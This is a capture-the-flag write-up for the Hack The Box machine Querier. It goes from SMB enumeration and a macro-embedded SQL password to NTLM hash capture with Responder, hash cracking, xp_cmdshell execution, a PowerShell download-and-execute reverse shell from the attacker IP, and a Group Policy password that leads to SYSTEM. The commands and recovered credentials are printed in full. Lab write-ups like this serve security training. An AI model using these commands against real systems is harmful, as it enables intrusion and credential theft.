This is the write-up for the box Querier that got retired at the 22nd June 2019. My IP address was 10.10.14.13 while I did this.
Let's put this in our hosts file:
10.10.10.125 querier.htb
Starting with a Nmap scan:
nmap -sC -sV -o nmap/querier.nmap 10.10.10.125
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-11-03T12:21:00
|_Not valid after: 2049-11-03T12:21:00
|_ssl-date: 2019-11-03T12:22:33+00:00; +3s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Scanning all ports:
nmap -p- -o nmap/alports_querier.nmap 10.10.10.125
PORT STATE SERVICE
(...)
5985/tcp open wsman
47001/tcp open winrm
(...)
Enumerating the SMB shares we get some interesting information:
smbmap -H 10.10.10.125 -u anyone
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ READ ONLY
Reports READ ONLY
We have Read permissions on the Reports folder. Connecting to it we can download the files:
smbclient -N //10.10.10.125/Reports
There is one file called Currency Volume Reports.xlsm which is an Excel sheet. We will analyze this file with Oletools that is build to analyze OLE and MS Office files and can be installed from the Kali repositories or from GitHub.
olevba "Currency Volume Report.xlsm"
This finds a macro in this Excel sheet that opens automatically with this code:
Private Sub Connect()
Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open
If conn.State = adStateOpen Then
' MsgBox "connection successful"
'Set rs = conn.Execute("SELECT * @@version;")
Set rs = conn.Execute("SELECT * FROM volume;")
Sheets(1).Range("A1").CopyFromRecordset rs
rs.Close
End If
End Sub
In this code we get the User ID reporting and a password PcwTWTHRwryjc$c6 for a SQL Server.
As we now have some credentials we try them on this SQL Server instance. For the connection we will use the mssqlclient.py script from the Impacket framework.
./mssqlclient.py reporting@10.10.10.125 -windows-auth
After putting in the password we get in and can execute commands that impacket provides us. The command enable_xp_cmdshell
is to start a shell but it fails because the user has no permission to do this, that's why we are going to extract his NTLM hash with Responder:
responder -I tun0
Now on the SQL Server we need to requests any authentication to our local machine:
xp_dirtree "\\10.10.14.13\Test\"
And we got the hash of the user mssql-svc:
[SMB] NTLMv2-SSP Client : 10.10.10.125
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash : mssql-svc::QUERIER:57cea40f4c2e712b:056A56D1BC6AB83312DCE4BD166EF4C6:0101000000000000C0653150DE09D2012F013EA964D29CC0000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000000000000003000002608F4E9B17E1DDF96359899FC51C16D550D74F9089591EB6BC3D4758EB9C3140A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003300000000000000000000000000
We can try to crack this with Hashcat:
hashcat -m 5600 querier.ntlm /opt/wordlist/rockyou.txt
After a while we get the password:
corporate568
With this credentials we can authenticate to the SQL Server again to see if we got more permissions:
./mssqlclient.py mssql-svc@10.10.10.125 -windows-auth
When we execute the command enable_xp_cmdshell
this time we get a shell and can verify this by running whoami:
xp_cmdshell whoami
So as we can execute any command we want to start a reverse shell. We will execute the Invoke-PowershellTcp.ps1 script from the Nishang framework that I will call shell.ps1 that listens on my IP and port 9001:
xp_cmdshell powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.13/shell.ps1')"
Running this starts a reverse shell on the box as the user mssql-svc.
To get any attack surface we will run the enumarating script PowerUp.ps1 from the PowerSploit framework to identify what we can exploit.
IEX(New-Object Net.WebClient).downloadString("http://10.10.14.13/PowerUp.ps1")
Invoke-AllChecks
This part of the output gives us interesting information:
[] Checking for cached Group Policy Preferences .xml files....
Changed : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File : C:\ProgramData\Microsoft\Group
Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
We get a password for the user Administrator that is hidden in a Group Policy XML file.
Lets try these credentials with psexec:
./psexec.py Administrator@10.10.10.125
Now we are NT Authority\SYSTEM on the box!